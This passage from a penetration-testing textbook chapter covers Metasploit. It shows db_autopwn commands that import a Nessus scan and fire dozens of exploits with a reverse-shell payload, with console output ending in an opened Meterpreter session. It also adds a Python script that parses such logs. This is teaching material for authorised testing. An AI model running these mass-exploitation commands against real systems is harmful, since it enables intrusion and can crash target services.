Chapter 4
The xspy tool remotely sniffs the X server’s keyboard session and has captured a user running SSH to log in as root on a remote system. Vulnerabilities such as this can be rare, but when you find them they are extremely valuable.
Using Scan Results for Autopwning
Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool automatically targets and exploits a system using an open port or using the results of a vulnerability scan export. You can use Autopwn to harness the results of most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.

For example, here’s how we could use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (-e), show all matching modules (-t), use a reverse shell payload (-r), select exploit modules based on vulnerability (-x), and also select based on open ports (-p). Once db_autopwn launches, Metasploit begins launching exploits at the targets. Successful exploits return a shell to the attacking machine.
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /root/nessus.nbe
msf > db_autopwn -e -t -r -x -p
[*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445...
. . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
Based on these scans, Autopwn launched 72 exploits and one was successful, as shown by the “Meterpreter session 1 opened” line. This exploit gives us full access to the machine through a Meterpreter console, which is discussed in far more depth in Chapter 6.
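A run like the one above is noisy: dozens of exploits are thrown at a handful of ports on each host, and only the session lines tell you which one landed. The parser below is an added example, not code from the book or from the Metasploit project. It reads a db_autopwn console transcript, records every "Launching ... against host:port" line and every "session N opened" line, and produces a per-host summary (modules fired, ports touched, sessions opened) plus a consistency check that the session counter in the progress lines agrees with the number of session-opened lines actually seen. The embedded transcript is constructed from the line formats shown on this page; the regular expressions are written against those formats and would need adjusting for other console output.

```python
"""Summarize a db_autopwn console transcript (added example, not from the book)."""
import re
from collections import defaultdict

# Constructed sample transcript, modelled on the output format shown in the chapter.
# The "SNIP" in the book's listing is omitted; only the lines that carry data are kept.
SAMPLE_LOG = """\
[*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
"""

# Progress prefix shared by "Launching" and "Waiting on" lines: "[*] (n/total [k sessions]):"
PROGRESS_RE = re.compile(
    r"^\[\*\] \((?P<index>\d+)/(?P<total>\d+) \[(?P<sessions>\d+) sessions\]\):"
)
# Full "Launching <module> against <host>:<port>..." line.
LAUNCH_RE = re.compile(
    r"^\[\*\] \((?P<index>\d+)/(?P<total>\d+) \[(?P<sessions>\d+) sessions\]\): "
    r"Launching (?P<module>\S+) against (?P<host>[^:\s]+):(?P<port>\d+)\.\.\.$"
)
# "<Kind> session <id> opened (<local> -> <remote>)"
SESSION_RE = re.compile(
    r"^\[\*\] (?P<kind>\w+) session (?P<id>\d+) opened "
    r"\((?P<local>\S+) -> (?P<remote>\S+)\)$"
)


def parse_autopwn_log(text):
    """Extract launch events, session events and the final counter values."""
    launched, sessions = [], []
    total, reported_sessions = None, 0
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PROGRESS_RE.match(line)
        if m:
            # Every progress line restates the totals; the last one wins.
            total = int(m["total"])
            reported_sessions = int(m["sessions"])
        m = LAUNCH_RE.match(line)
        if m:
            launched.append({
                "index": int(m["index"]),
                "module": m["module"],
                "host": m["host"],
                "port": int(m["port"]),
            })
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append({
                "kind": m["kind"],
                "id": int(m["id"]),
                "local": m["local"],
                "remote": m["remote"],
            })
    return {
        "total": total,                      # exploits the counter says were launched
        "launched": launched,                # launch lines actually present in the text
        "sessions": sessions,
        "reported_sessions": reported_sessions,
    }


def summarize(parsed):
    """Per-host view: which modules were fired at which ports, and how many shells resulted."""
    per_host = defaultdict(lambda: {"modules": [], "ports": set()})
    for ev in parsed["launched"]:
        per_host[ev["host"]]["modules"].append(ev["module"])
        per_host[ev["host"]]["ports"].add(ev["port"])
    return {
        "exploits_declared": parsed["total"],
        "launch_lines_seen": len(parsed["launched"]),
        "sessions_opened": len(parsed["sessions"]),
        # True when the "[k sessions]" counter matches the session lines we parsed.
        "counter_consistent": len(parsed["sessions"]) == parsed["reported_sessions"],
        "per_host": dict(per_host),
    }


if __name__ == "__main__":
    result = summarize(parse_autopwn_log(SAMPLE_LOG))
    print(f"exploits declared: {result['exploits_declared']}, "
          f"sessions opened: {result['sessions_opened']}, "
          f"counter consistent: {result['counter_consistent']}")
    for host, info in result["per_host"].items():
        print(f"{host}: {len(info['modules'])} modules on ports {sorted(info['ports'])}")
```

The gap between exploits_declared (72) and launch_lines_seen (3) is exactly what the book's SNIP hides; on a full transcript the two should match, and a mismatch points at truncated output. The per-host module count is the number a target's own logs will reflect, which is why the stability caveat below matters.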
NOTE
One big caveat to remember when using Autopwn: If you’re going in with your Autopwn guns blazing, the target system can crash or lose stability. Autopwn has useful features not covered here, such as the ability to select only exploits that have an “Excellent” ranking, meaning it is very unlikely they will crash the remote system or service. For more information on its usage, enter db_autopwn -h.